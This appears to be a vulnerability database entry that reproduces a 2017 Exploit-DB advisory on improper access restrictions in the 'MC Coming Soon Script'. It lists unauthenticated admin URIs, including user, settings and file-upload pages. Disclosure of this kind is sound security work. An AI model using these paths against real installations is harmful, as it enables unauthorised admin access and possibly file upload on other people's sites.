Improper Access Restrictions

vendor:

MC Coming Soon Script

by:

İhsan Şencan

N/A

CVSS

N/A

Improper Access Restrictions

Unknown

CWE

Product Name: MC Coming Soon Script

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unknown

2017

Improper Access Restrictions

An attacker can exploit this issue via a browser. The following example URIs are available: http://localhost/[PATH]/admin/slider.php, file.php upload, http://localhost/[PATH]/admin/imageslider/file.php, http://localhost/[PATH]/admin/launch_time.php, http://localhost/[PATH]/admin/launch_message.php, http://localhost/[PATH]/admin/send_message.php, http://localhost/[PATH]/admin/subscribers.php, http://localhost/[PATH]/admin/settings.php, http://localhost/[PATH]/admin/users.php

Mitigation:

Unknown

Source

Exploit-DB raw data:

# # # # # 
# Vulnerability: Improper Access Restrictions
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Coming Soon Script
# Script Buy Now: http://microcode.ws/product/mc-coming-soon-php-script/3880
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# 
# http://localhost/[PATH]/admin/slider.php
# file.php upload 
# http://localhost/[PATH]/admin/imageslider/file.php
# 
# http://localhost/[PATH]/admin/launch_time.php
# http://localhost/[PATH]/admin/launch_message.php
# http://localhost/[PATH]/admin/send_message.php
# http://localhost/[PATH]/admin/subscribers.php
# http://localhost/[PATH]/admin/settings.php
# http://localhost/[PATH]/admin/users.php
# Vs.......
# # # # #